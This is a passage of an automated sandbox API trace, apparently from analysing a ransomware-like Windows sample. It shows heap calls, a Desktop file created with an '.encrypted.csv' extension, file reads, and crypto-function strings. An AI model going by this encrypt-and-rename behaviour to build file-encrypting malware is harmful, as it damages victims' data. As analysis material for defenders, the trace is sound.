lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.encrypted.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpwh2letaqsal.encrypted.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.035] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.035] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x93d0, lpOverlapped=0x0) returned 1 [0032.036] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x93d0) returned 0x945010 [0032.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x93d0) returned 0x94e3e8 [0032.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x93d0) returned 0x945010 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.038] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x93d0) returned 0x945010 [0032.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x93d0) returned 0x9577c0 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.041] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3a8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.041] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.042] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.042] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.043] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.043] 